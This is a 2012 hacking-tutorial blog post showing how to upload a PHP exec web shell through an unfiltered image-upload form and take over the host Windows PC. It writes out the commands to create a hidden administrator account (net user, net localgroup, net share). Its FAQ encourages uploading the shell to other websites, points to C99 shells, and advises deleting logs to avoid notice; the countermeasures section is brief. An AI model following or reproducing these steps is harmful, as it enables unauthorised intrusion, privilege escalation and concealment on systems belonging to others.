• +
PHP Exec for Executing a Program or Even Hacking?

PHP Exec for Executing a Program or Even Hacking?

Bookmark

Date : June 2, 2012

Type : Tutorial

Level : Easy

Actually this post was a little bit different with my other posts because I put the date attribute on the top of this post. Actually its because today was my birthday and I want to say thank you to all of the follower of this blog in twitter, facebook (that reach 1K more in my birthday πŸ™‚ ), networkedblogs, e-mail, or you that came here from Google, Baidu, Yahoo, Bing, etc. It's because all of you I really love to wrote this tutorial and sharing blog to share with all of you. Thank you…

today quote for me and also for my blog readers :

Give a man a fish and he will eat for a day.

Teach him how to fish and he will sit in a boat and drink beer all day.

 

The title sounds provocative πŸ˜› but it's true that with your PHP code, you can hack a system or someone PC or even a web server.

Today tutorial background story was from my experience as a university student…

In Indonesia while I was pursuing my bachelor degree (around 2002-2003) I live by rent a room, so it's a house with many rooms and the owner rent it so they can get monthly fee by student who live there, in Indonesian language its called "nge-kost". I live with some of my friend that pursuing the same degree in computer field and we also have the same homework about how to upload an image to web server πŸ˜› .

Here's the network topology of my "kost" on that time :

PHP Exec for Executing a Program or Even Hacking?

We can access other users if we have access to that PC(common LAN topology isn't?), and port 80 was a public port and everyone can use it.

We do that homework together and of course I know in which folder he make that upload feature(because we test it together).

To make this hack work PHP safe_mode should set to OFF, but usually for web development many developer or new learning users use XAMPP or WAMP, etc which came with default safe_mode set to OFF. The other thing was there's no extension filter for the type of file that we upload.

Also you need to know the web server was run using which programming language? for this example it was using PHP so it will be different for ASP, JSP, etc.

Requirements :

1. Upload Image PHP Script

2. PHP exec script

Download both files below from mediafire.com:

Mediafire.com

 

Step by Step :

1. Know the upload feature (in my case was the folder where's my friend put his script for upload feature)

2. Access the address and upload your PHP exec script. In this picture below I'm using myscript.php for PHP exec script name.

PHP Exec for Executing a Program or Even Hacking?

3. In this tutorial every uploaded file will be saved on the folder with name "data" on the web server, because I make this script very simple. But in real world if you want to know on which folder the data/image was uploaded, you can follow the trailing slash after the file has been uploaded(in preview section).

PHP Exec for Executing a Program or Even Hacking?

4. Now I will access the folder called data with my file inside it called myscript.php, and try to run a simple command dir c:\.

PHP Exec for Executing a Program or Even Hacking?

5. As you can see from step 4, now even I can do the command below.

PHP Exec for Executing a Program or Even Hacking?

Description :

1. net user /add v4L 12345 
--> this command will add new user v4L with password 12345

2. net localgroup administrators v4L /add
--> this will add username v4L to administrators group

3. net share concfg*C:\/grant:v4L,full
--> this command will give the full administrator right to the user.

6. Here's the result πŸ™‚

PHP Exec for Executing a Program or Even Hacking?

Only from upload feature and I can own his computer πŸ™‚ …but after that I told him about this and we fixed it together…LoL

Countermeasures :

1. Turn ON your PHP safe_mode (Click here to view tutorial how to turn on php safe_mode to ON)

2. Always turn ON your UAC (User Account Control) for Vista and Windows 7, because some users turn it off(including me πŸ˜› ) because they don't like some pop up window while run a program…LoL

3. For developer to make sure you always filter and sanitize the data.

FAQ :

1. Can I upload this script on some website?

Answer : Sure of course as long as it's website safe_mode configuration turned OFF and there's no extension filtering. Maybe for advanced functional you can use C99 script or C99madshell, or other script available on the net.

2. Will the user or admin know that if I'm successfully upload this script and execute it?

Answer : maybe for LAN users, make sure you delete all records before he shut down the computer, if not your username will be on his log in window  πŸ˜›

Hope you found it useful πŸ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com